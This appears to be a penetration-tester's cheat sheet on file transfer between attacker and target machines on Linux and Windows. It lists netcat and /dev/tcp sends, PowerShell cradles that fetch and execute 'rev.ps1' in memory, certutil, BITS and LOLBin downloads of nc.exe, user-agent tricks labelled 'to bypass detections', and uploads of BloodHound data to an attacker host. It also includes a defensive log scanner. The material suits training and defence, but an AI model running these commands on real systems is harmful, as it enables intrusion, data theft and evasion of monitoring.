# File Transfers

## 01. Linux

* Simple file transfer (My way)

```bash
## ------------------| NetCat
### Receiving side
nc -lp 1234 > out.file
### Sending side
nc -w 3 <ReceiverIP> 1234 < out.file
cat out.file > /dev/tcp/<DestinationIP>/1234

## ------------------| Socat
### Sending side
socat TCP4-LISTEN:1234,fork file:secret.txt
### Receiving side
socat TCP4:<SenderIP>:1234 file:secret.txt,create

## ------------------| SSH
### To copy a file from B to A while logged into B:
scp /path/to/file username@a:/path/to/destination
### To copy a file from B to A while logged into A:
scp username@b:/path/to/file /path/to/destination
```

* Download Files.

```bash
## ------------------| AXEL
axel -a -n 10 -k -o /tmp/secret.txt https://<IP>/secret.txt
## -a    Alternate progress indicator
## -n    Specify maximum number of connections
## -k    Don't verify the SSL certificate

## ------------------| WGET
wget https://<IP>/secret.txt -O /tmp/secret.txt

## ------------------| CURL
curl https://<IP>/secret.txt -o /tmp/secret.txt 

## ------------------| OpenSSL
### Create certificate
openssl req -newkey rsa:2048 -nodes -keyout key.pem -x509 -days 365 -out certificate.pem     
### Stand up server
openssl s_server -quiet -accept 80 -cert certificate.pem -key key.pem < /tmp/secret.txt
### Download file
openssl s_client -connect <IP>:80 -quiet > secret.txt

## ------------------| Bash (/dev/tcp)
### Connect to Target's Webserver
exec 3<>/dev/tcp/10.10.10.32/80
### HTTP GET Request (HTTP/1.1 requires a Host header; Connection: close makes the server hang up so cat returns instead of waiting on keep-alive)
echo -e "GET /secret.txt HTTP/1.1\r\nHost: 10.10.10.32\r\nConnection: close\r\n\r\n" >&3
### Print the Response (response headers first, then the file body)
cat <&3

## ------------------| PHP
### File_get_contents()
php -r '$file = file_get_contents("https://<IP>/secret.txt"); file_put_contents("secret.txt",$file);'       
### Fopen()
php -r 'const BUFFER = 1024; $fremote = fopen("https://<IP>/secret.txt", "rb"); $flocal = fopen("secret.txt", "wb"); while ($buffer = fread($fremote, BUFFER)) { fwrite($flocal, $buffer); } fclose($flocal); fclose($fremote);'      

## ------------------| Python
### default (requests module)
python -c "import requests; open('secret.txt', 'wb').write(requests.get('http://<IP>/secret.txt').content)"
### Python2
python2 -c 'import urllib; urllib.urlretrieve("https://<IP>/secret.txt", "secret.txt")'
### Python3
python3 -c 'import urllib.request; urllib.request.urlretrieve("https://<IP>/secret.txt", "secret.txt")'

## ------------------| Ruby
ruby -e 'require "net/http"; File.write("secret.txt", Net::HTTP.get(URI.parse("https://<IP>/secret.txt")))'

## ------------------| Perl
perl -e 'use LWP::Simple; getstore("https://<IP>/secret.txt", "secret.txt");'
```

## 02. Windows

* [Powercat](https://github.com/besimorhino/powercat)

```bash
## ------------------| Download (attacker side) & load into memory (target side)
wget https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1
powershell -c "IEX (New-Object System.Net.Webclient).DownloadString('http://<IP>/powercat.ps1')"

## ------------------| Sender 
powercat -c <IP> -p 1212 -i C:\Users\secret.txt

## ------------------| Receiver
nc -lnvp 1212 > secret.txt
```

* Download files.

```bash
## ------------------| Old way (works on any PowerShell version)
powershell -c "(New-Object System.Net.WebClient).DownloadFile('http://<IP>/nc.exe', 'C:\Users\Public\nc.exe')" 

## ------------------| New version (alias IWR)
powershell -c "Invoke-WebRequest http://<IP>/nc.exe -OutFile C:\Users\Public\nc.exe"

## ------------------| Executed in memory (alias IEX)
powershell -c "Invoke-Expression (New-Object Net.WebClient).DownloadString('http://10.10.14.25/rev.ps1')"
powershell -c "Invoke-WebRequest http://10.10.14.25/rev.ps1 | iex"

## ------------------| Internet Explorer’s First Run error (-UseBasicParsing)
powershell -c "IWR -UseBasicParsing http://<IP>/nc.exe -OutFile C:\Users\Public\nc.exe"
### If you have admin access you can disable Internet Explorer’s First Run customization
reg add "HKLM\SOFTWARE\Microsoft\Internet Explorer\Main" /f /v DisableFirstRunCustomize /t REG_DWORD /d 2

## ------------------| CMD ways
certutil -urlcache -split -f "http://<IP>/nc.exe" C:\Users\Public\nc.exe

## ------------------| Using curl (in Windows PowerShell 5.1 curl is an alias of Invoke-WebRequest; in PowerShell 7+ it runs the real curl.exe)
powershell curl http://<IP>/rev.ps1

## ------------------| The Background Intelligent Transfer Service (BITS)
bitsadmin /transfer n http://<IP>/nc.exe C:\Temp\nc.exe
Import-Module bitstransfer;Start-BitsTransfer -Source "http://<IP>/nc.exe" -Destination "C:\Temp\nc.exe"
```

* Upload Files.

```bash
## ------------------| Base64 over HTTP POST
### -Encoding Byte is Windows PowerShell 5.1 syntax; PowerShell 7+ uses -AsByteStream
$b64 = [System.convert]::ToBase64String((Get-Content -Path 'C:/<PATH>/BloodHound.zip' -Encoding Byte))
Invoke-WebRequest -Uri http://<IP>:443 -Method POST -Body $b64
### Receive the POST body with netcat on the attacker side (e.g. nc -lvnp 443), then decode it
echo <base64> | base64 -d > bloodhound.zip

## ------------------| The Background Intelligent Transfer Service (BITS)
Start-BitsTransfer "C:\Temp\bloodhound.zip" -Destination "http://<IP>/uploads/bloodhound.zip" -TransferType Upload -ProxyUsage Override -ProxyList PROXY01:8080 -ProxyCredential INLANEFREIGHT\svc-sql

## ------------------| HTTP POST
### Create the following up.php on the host machine
<?php
$up_dir = '/var/www/html/';
// basename() keeps only the file name, so a crafted name cannot write outside $up_dir
$up_file = $up_dir . basename($_FILES['file']['name']);
// the uploaded data lives in the temporary file ('tmp_name'), not under 'name'
move_uploaded_file($_FILES['file']['tmp_name'], $up_file);
?>
### Change file permission
sudo chown www-data: /var/www/html
### Upload file through powershell (UploadFile sends the file in a form field named "file")
powershell (New-Object Net.WebClient).UploadFile('http://<IP>/up.php', 'nc.exe')
```

* `wget` Scripts

```javascript
// ------------------| Create wget.js file
var WinHttpReq = new ActiveXObject("WinHttp.WinHttpRequest.5.1");
WinHttpReq.Open("GET", WScript.Arguments(0), /*async=*/false);
WinHttpReq.Send();
var BinStream = new ActiveXObject("ADODB.Stream");
BinStream.Type = 1;
BinStream.Open();
BinStream.Write(WinHttpReq.ResponseBody);
BinStream.SaveToFile(WScript.Arguments(1));
```

```bash
## ------------------| It can be executed as follows.
cscript /nologo wget.js http://<IP>/nc.exe nc.exe
```

```vbscript
' ------------------| Create wget.vbs file
dim xHttp: Set xHttp = createobject("Microsoft.XMLHTTP")
dim bStrm: Set bStrm = createobject("Adodb.Stream")
xHttp.Open "GET", WScript.Arguments.Item(0), False
xHttp.Send

with bStrm
    .type = 1
    .open
    .write xHttp.responseBody
    .savetofile WScript.Arguments.Item(1), 2
end with
```

```bash
## ------------------| It can be executed as follows.
cscript /nologo wget.vbs http://<IP>/nc.exe nc.exe
```

* Different `User-Agent` strings (to bypass detections)

```bash
## ------------------| WinHttp (Netscape 4.0)
$h=new-object -com WinHttp.WinHttpRequest.5.1;
$h.open('GET','http://<IP>/nc.exe',$false);
$h.send();
iex $h.ResponseText

## ------------------| Msxml2 (Internet Explorer 7.0)
$h=New-Object -ComObject Msxml2.XMLHTTP;
$h.open('GET','http://<IP>/nc.exe',$false);
$h.send();
iex $h.responseText

## ------------------| Certutil
certutil -urlcache -split -f http://<IP>/nc.exe 
certutil -verifyctl -split -f http://<IP>/nc.exe

## ------------------| BITS
Import-Module bitstransfer;
Start-BitsTransfer 'http://<IP>/nc.exe' $env:temp\t;
$r=gc $env:temp\t;
rm $env:temp\t; 
iex $r

## ------------------| Invoke-WebRequest with User-Agent
### List all available user agents
[Microsoft.PowerShell.Commands.PSUserAgent].GetProperties() | Select-Object Name,@{label="User Agent";Expression={[Microsoft.PowerShell.Commands.PSUserAgent]::$($_.Name)}} | fl
### Download file using a Chrome User Agent (the static member must be wrapped in parentheses, otherwise PowerShell passes it as a literal string)
Invoke-WebRequest http://<IP>/nc.exe -UserAgent ([Microsoft.PowerShell.Commands.PSUserAgent]::Chrome) -OutFile "C:\Users\Public\nc.exe"
```
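The User-Agent swaps above work because every downloader on this page announces itself with a telltale default UA. As an added example (not from the original page), the Python script below shows the defender's side of that: it flags those default UAs in constructed access-log lines, and also flags a clean browser UA that fetches an executable directly with no Referer, which is what a spoofed `-UserAgent` download looks like in the logs. The sample log lines are constructed; the UA fragments are the tools' defaults (System.Net.WebClient sends none at all).

```python
import re

# Constructed sample lines (combined log format, not real traffic) mirroring this page's
# downloaders: certutil, BITS, Invoke-WebRequest, WinHttpRequest, WebClient (no UA), spoofed Chrome.
SAMPLE_LOG = r'''
10.10.14.5 - - [01/Jan/2024:10:00:01 +0000] "GET /nc.exe HTTP/1.1" 200 38616 "-" "Microsoft-CryptoAPI/10.0"
10.10.14.5 - - [01/Jan/2024:10:00:02 +0000] "GET /nc.exe HTTP/1.1" 200 38616 "-" "Microsoft BITS/7.8"
10.10.14.5 - - [01/Jan/2024:10:00:03 +0000] "GET /rev.ps1 HTTP/1.1" 200 1203 "-" "Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1"
10.10.14.5 - - [01/Jan/2024:10:00:04 +0000] "GET /nc.exe HTTP/1.1" 200 38616 "-" "Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)"
10.10.14.5 - - [01/Jan/2024:10:00:05 +0000] "GET /nc.exe HTTP/1.1" 200 38616 "-" "-"
10.10.14.5 - - [01/Jan/2024:10:00:06 +0000] "GET /nc.exe HTTP/1.1" 200 38616 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0 Safari/537.36"
10.10.14.5 - - [01/Jan/2024:10:00:07 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0 Safari/537.36"
'''

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
                    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$')

# Default User-Agent fragments of the download tools used on this page.
TOOL_UA_MARKERS = {
    "Microsoft-CryptoAPI/": "certutil",
    "Microsoft BITS/": "bitsadmin / Start-BitsTransfer",
    "WindowsPowerShell/": "Invoke-WebRequest (default PSUserAgent)",
    "WinHttp.WinHttpRequest": "WinHttp.WinHttpRequest COM object",
    "MSIE 7.0": "Msxml2.XMLHTTP COM object",
}
PAYLOAD_EXT = (".exe", ".dll", ".ps1", ".bat", ".vbs", ".js", ".hta")

def classify(line):
    # Return a finding tag for one log line, or None if nothing stands out.
    m = LOG_RE.match(line)
    if not m:
        return None
    ua, path, referer = m["ua"], m["path"], m["referer"]
    for marker, tool in TOOL_UA_MARKERS.items():
        if marker in ua:
            return "tool-ua:" + tool
    if ua in ("", "-"):
        return "empty-ua"  # System.Net.WebClient sends no User-Agent unless one is set
    # A "browser" UA fetching a binary or script directly with no Referer is what a spoofed
    # -UserAgent looks like: the UA string is clean, but the request pattern is not.
    if path.lower().endswith(PAYLOAD_EXT) and referer == "-":
        return "browser-ua-direct-payload-fetch"
    return None

def scan(log_text):
    # Return (ip, path, tag) for every line that classify() flags.
    pairs = [(LOG_RE.match(ln), classify(ln)) for ln in log_text.strip().splitlines()]
    return [(m["ip"], m["path"], tag) for m, tag in pairs if tag]
```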

* [`exe2hex`](https://github.com/g0tmi1k/exe2hex)

```bash
### Compress first so the resulting text file stays small
upx -9 nc.exe
### -x  input executable; exe2hex writes batch/PowerShell text files that rebuild the binary on the target
exe2hex -x nc.exe
```

## 03. Simple Servers

* Web servers

```bash
## ------------------| Python
python2 -m SimpleHTTPServer 8080
python3 -m http.server 8080

## ------------------| Ruby
ruby -run -e httpd . -p 8080

## ------------------| PHP
php -S 0.0.0.0:8080

## ------------------| Socat (serves one file raw to each client, no HTTP)
socat TCP-LISTEN:8080,reuseaddr,fork file:secret.txt

## ------------------| BusyBox
busybox httpd -f -p 10000

## ------------------| HTTPS 
git clone https://github.com/h4rithd/SPython3.git && cd SPython3
pip3 install -r requirements.txt
python3 spython3.py
```

* FTP server

```bash
### -w enables write access (uploads); pyftpdlib listens on port 2121 by default, add --port 21 for the standard port
python3 -m pyftpdlib --user=pentester --password=p4ssw0rd -w
```

* TFTP server (requires administrative access)

```bash
## ------------------| Windows: enable the TFTP client (CMD / PowerShell)
DISM /online /Enable-Feature /FeatureName:TFTP
Install-WindowsFeature TFTP-Client

## ------------------| Linux: TFTP server
sudo apt-get install -y atftp
mkdir /tmp/tftp
sudo chown nobody: /tmp/tftp
### The Windows tftp client cannot change the port, so listen on the default 69
sudo atftpd --daemon --port 69 /tmp/tftp

## ------------------| Upload file (on windows machine)
tftp -i <IP> put nc.exe
```

* SMB server

```bash
## ------------------| Basic usage
impacket-smbserver <shareName> <sharePath>
impacket-smbserver share $(pwd) -smb2support

## ------------------| Start smb server (with auth)
impacket-smbserver share $(pwd) -smb2support -username h4rithd -password Password123

## ------------------| Mount without auth
net use Z: \\<MyIP>\share
New-PSDrive -Name h4rithd -PSProvider FileSystem -Root \\<MyIP>\share

## ------------------| Mount with auth
net use Z: \\<MyIP>\share /USER:h4rithd Password123
$pass = ConvertTo-SecureString 'Password123' -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential('h4rithd', $pass)
New-PSDrive -Name h4rithd -PSProvider FileSystem -Credential $cred -Root \\<MyIP>\share
cd h4rithd:
dir
```

* RDP Server

```bash
### Share /tmp/shares as drive "tmp" inside the session
rdesktop -g 1600x800 -r disk:tmp=/tmp/shares <IP> -u h4rithd -p Password123
### /drive:<name>,<path> shares a local directory as <name>
xfreerdp /u:h4rithd /p:Password123 /cert:ignore /v:<IP> /workarea /drive:share,/localdir /dynamic-resolution +clipboard
```

* Setup `nginx` server to upload files.

```bash
## ------------------| Create server
mkdir -p /tmp/uploads
chmod 777 /tmp/uploads/
sudo chown www-data /tmp/uploads/

### Write /etc/nginx/sites-available/file_upload with the following content
sudo vi /etc/nginx/sites-available/file_upload
server {
    listen 8001 default_server;
    server_name up.h4rithd;
    location / {
        root /tmp/uploads;
        dav_methods PUT;
    }
}

sudo ln -s /etc/nginx/sites-available/file_upload /etc/nginx/sites-enabled/file_upload
sudo systemctl restart nginx

## ------------------| Upload File (curl sends a PUT; the file lands in /tmp/uploads/UploadFile.txt)
curl --upload-file UploadFile.txt http://<IP>:8001/
```
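The one-line servers in this section only serve downloads, and the nginx block only accepts PUT. As an added example (not part of the original page), the Python server below does both in one process: GET serves the current directory like `python3 -m http.server`, PUT stores the body under a sanitised file name so a crafted path cannot escape the upload directory, and every upload is logged with its SHA-256 so it can be checked against the sender's hash. Port 8001 and /tmp/uploads are assumptions chosen to match the nginx example.

```python
import hashlib
import os
from http.server import SimpleHTTPRequestHandler, ThreadingHTTPServer

# Assumption: same port (8001) and directory (/tmp/uploads) as the nginx example above.
UPLOAD_DIR = "/tmp/uploads"

def safe_name(request_path):
    # Keep only the last path component so "/../../etc/cron.d/x" stays inside UPLOAD_DIR.
    name = os.path.basename(request_path.split("?", 1)[0].rstrip("/"))
    return name or "upload.bin"

def store(body, request_path, upload_dir=UPLOAD_DIR):
    # Write the body under a sanitised name and return (path, sha256) so the
    # receiver can compare the digest with the sender's copy.
    os.makedirs(upload_dir, exist_ok=True)
    dest = os.path.join(upload_dir, safe_name(request_path))
    with open(dest, "wb") as f:
        f.write(body)
    return dest, hashlib.sha256(body).hexdigest()

class Handler(SimpleHTTPRequestHandler):
    # GET serves the working directory like `python3 -m http.server`;
    # PUT (what `curl --upload-file` sends) stores the raw body.
    def do_PUT(self):
        length = int(self.headers.get("Content-Length", 0))
        dest, digest = store(self.rfile.read(length), self.path)
        # Log hash and User-Agent so the transfer can be verified (and spotted) later.
        self.log_message("stored %s sha256=%s ua=%s", dest, digest,
                         self.headers.get("User-Agent", "-"))
        self.send_response(201)
        self.send_header("Content-Type", "text/plain")
        self.end_headers()
        self.wfile.write((digest + "\n").encode())

if __name__ == "__main__":
    ThreadingHTTPServer(("0.0.0.0", 8001), Handler).serve_forever()
```

The client side is unchanged: `curl --upload-file UploadFile.txt http://<IP>:8001/` and the server answers with the SHA-256 of what it stored.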

## 04. Living Off The Land Binaries

* [Windows](https://lolbas-project.github.io/#gfxdownloadwrapper)

```bash
GfxDownloadWrapper.exe "http://<IP>/nc.exe" "C:\Temp\nc.exe"
```

* [Linux](https://gtfobins.github.io/gtfobins/lwp-download/)

```bash
lwp-download http://<IP>/nc.exe nc.exe
```

